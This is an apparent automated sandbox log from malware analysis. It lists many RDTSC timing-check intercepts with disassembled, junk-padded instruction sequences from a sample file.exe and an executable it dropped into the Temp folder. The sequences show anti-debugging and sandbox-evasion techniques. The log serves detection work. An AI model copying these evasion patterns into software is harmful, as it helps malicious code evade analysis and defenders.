Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF05E4 second address: 4DF0623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FB678E7E71Fh 0x0000000f jmp 00007FB678E7E6F0h 0x00000014 add eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB678E7E6F7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0623 second address: 4DF0629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0629 second address: 4DF0661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b jmp 00007FB678E7E6F7h 0x00000010 test ecx, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB678E7E6F0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0661 second address: 4DF0670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE01A7 second address: 4DE021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FB678E7E6EFh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 movzx eax, di 0x00000016 movsx edi, cx 0x00000019 popad 0x0000001a sub esp, 2Ch 0x0000001d jmp 00007FB678E7E6F8h 0x00000022 xchg eax, ebx 0x00000023 jmp 00007FB678E7E6F0h 0x00000028 push eax 0x00000029 pushad 0x0000002a mov edi, 2876F0D4h 0x0000002f mov dx, 4640h 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 jmp 00007FB678E7E6EFh 0x0000003a xchg eax, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE021A second address: 4DE021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE021E second address: 4DE0224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0224 second address: 4DE0276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6784C8BE8h 0x00000009 adc eax, 76726EE8h 0x0000000f jmp 00007FB6784C8BDBh 0x00000014 popfd 0x00000015 mov ecx, 42C636DFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FB6784C8BE7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0276 second address: 4DE0293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0293 second address: 4DE0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0299 second address: 4DE029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE02C0 second address: 4DE02DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE02DB second address: 4DE02E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE02E1 second address: 4DE030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007FB6784C8BDFh 0x00000012 sub edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE030B second address: 4DE030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE030F second address: 4DE0315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0315 second address: 4DE031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE031B second address: 4DE031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE031F second address: 4DE0388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 jmp 00007FB678E7E6F1h 0x0000000e test al, al 0x00000010 pushad 0x00000011 mov edi, ecx 0x00000013 pushfd 0x00000014 jmp 00007FB678E7E6F8h 0x00000019 adc esi, 0F8C5F88h 0x0000001f jmp 00007FB678E7E6EBh 0x00000024 popfd 0x00000025 popad 0x00000026 je 00007FB678E7E848h 0x0000002c pushad 0x0000002d jmp 00007FB678E7E6F4h 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0412 second address: 4DE041B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, D37Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE041B second address: 4DE0421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0421 second address: 4DE046D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FB6784C8BE8h 0x0000000f jg 00007FB6E9146C1Fh 0x00000015 jmp 00007FB6784C8BE0h 0x0000001a js 00007FB6784C8C49h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB6784C8BDAh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE046D second address: 4DE047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE047C second address: 4DE0494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0494 second address: 4DE04EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007FB678E7E6F7h 0x00000010 jne 00007FB6E9AFC6CBh 0x00000016 jmp 00007FB678E7E6F6h 0x0000001b mov ebx, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB678E7E6F7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE04EE second address: 4DE0536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007FB6784C8BDEh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB6784C8BE7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0536 second address: 4DE0556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB678E7E6F3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0556 second address: 4DE0580 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 3B0Ah 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007FB6784C8BE9h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0580 second address: 4DE05E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FB678E7E6F0h 0x0000000f sbb ecx, 43DB5658h 0x00000015 jmp 00007FB678E7E6EBh 0x0000001a popfd 0x0000001b popad 0x0000001c nop 0x0000001d jmp 00007FB678E7E6F6h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB678E7E6EEh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE05E1 second address: 4DE05E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE06B9 second address: 4DD0DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB678E7E6F7h 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB678E7E6F1h 0x00000017 sbb si, 3646h 0x0000001c jmp 00007FB678E7E6F1h 0x00000021 popfd 0x00000022 mov ecx, 3DFC98F7h 0x00000027 popad 0x00000028 je 00007FB6E9AFC630h 0x0000002e xor eax, eax 0x00000030 jmp 00007FB678E57E1Ah 0x00000035 pop esi 0x00000036 pop edi 0x00000037 pop ebx 0x00000038 leave 0x00000039 retn 0004h 0x0000003c nop 0x0000003d cmp eax, 00000000h 0x00000040 setne cl 0x00000043 xor ebx, ebx 0x00000045 test cl, 00000001h 0x00000048 jne 00007FB678E7E6E7h 0x0000004a jmp 00007FB678E7E85Bh 0x0000004f call 00007FB67DB08749h 0x00000054 mov edi, edi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FB678E7E6ECh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0DD4 second address: 4DD0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 128A9CE4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007FB6784C8BDBh 0x00000016 pop eax 0x00000017 mov eax, edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0DF4 second address: 4DD0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0DFA second address: 4DD0DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0DFE second address: 4DD0E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FB678E7E6F0h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FB678E7E6F3h 0x00000020 and ah, FFFFFFBEh 0x00000023 jmp 00007FB678E7E6F9h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0E5C second address: 4DD0EBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 53D2h 0x00000007 pushfd 0x00000008 jmp 00007FB6784C8BE3h 0x0000000d adc esi, 34EB47CEh 0x00000013 jmp 00007FB6784C8BE9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ecx 0x0000001d jmp 00007FB6784C8BDEh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB6784C8BDDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0EBB second address: 4DD0EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0EC1 second address: 4DD0EEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB6784C8BE8h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0EEE second address: 4DD0F18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB678E7E6F0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0F18 second address: 4DD0F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0F27 second address: 4DD0F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0F2D second address: 4DD0F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0F4E second address: 4DD0F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DD0F54 second address: 4DD0F98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007FB6784C8BE5h 0x0000000c and ax, 0AE6h 0x00000011 jmp 00007FB6784C8BE1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a leave 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FB6784C8BDAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D3E second address: 4DE0D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D42 second address: 4DE0D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D46 second address: 4DE0D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D4C second address: 4DE0D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BE1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D61 second address: 4DE0D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D65 second address: 4DE0D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, 1CF5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D78 second address: 4DE0D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0D7D second address: 4DE0D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E006FC second address: 4E00702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00702 second address: 4E00730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FB6784C8BE8h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bl, 6Ch 0x00000016 mov si, 5A95h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00730 second address: 4E007C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FB678E7E6EEh 0x00000016 sbb eax, 380C1998h 0x0000001c jmp 00007FB678E7E6EBh 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov cx, 8D47h 0x0000002a pushfd 0x0000002b jmp 00007FB678E7E6ECh 0x00000030 and esi, 359443F8h 0x00000036 jmp 00007FB678E7E6EBh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007FB678E7E6F9h 0x00000043 xchg eax, esi 0x00000044 jmp 00007FB678E7E6EEh 0x00000049 mov esi, dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E007C1 second address: 4E007C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E007C5 second address: 4E007CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E007CB second address: 4E00866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov cl, C1h 0x0000000e pushfd 0x0000000f jmp 00007FB6784C8BE3h 0x00000014 jmp 00007FB6784C8BE3h 0x00000019 popfd 0x0000001a popad 0x0000001b je 00007FB6E911677Ch 0x00000021 jmp 00007FB6784C8BE6h 0x00000026 cmp dword ptr [75AB459Ch], 05h 0x0000002d pushad 0x0000002e pushad 0x0000002f mov edx, ecx 0x00000031 mov bh, cl 0x00000033 popad 0x00000034 push ebx 0x00000035 jmp 00007FB6784C8BE0h 0x0000003a pop ecx 0x0000003b popad 0x0000003c je 00007FB6E912E81Fh 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 call 00007FB6784C8BDAh 0x0000004a pop eax 0x0000004b mov cx, bx 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00866 second address: 4E0086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0086C second address: 4E008CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a push eax 0x0000000b pushfd 0x0000000c jmp 00007FB6784C8BE7h 0x00000011 and eax, 2146A4AEh 0x00000017 jmp 00007FB6784C8BE9h 0x0000001c popfd 0x0000001d pop eax 0x0000001e mov dh, EAh 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FB6784C8BE3h 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E008CE second address: 4E008D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00912 second address: 4E00924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E0097D second address: 4E00999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 movzx esi, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E00999 second address: 4E0099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: CE543 second address: CE549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: CE549 second address: CE553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: CE553 second address: CE557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: CDE28 second address: CDE3F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB6784C8BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: CDE3F second address: CDE49 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: CDE49 second address: CDE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BDEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 240702 second address: 240735 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB678E7E6F6h 0x00000008 jmp 00007FB678E7E6F0h 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FB678E7E6F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25964C second address: 25965E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB6784C8BD6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 2597D0 second address: 2597E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FB678E7E6F1h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 259995 second address: 25999E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 25999E second address: 2599A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe RDTSC instruction interceptor: First address: 2599A6 second address: 2599B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BDCh 0x00000009 popad 0x0000000a rdtsc
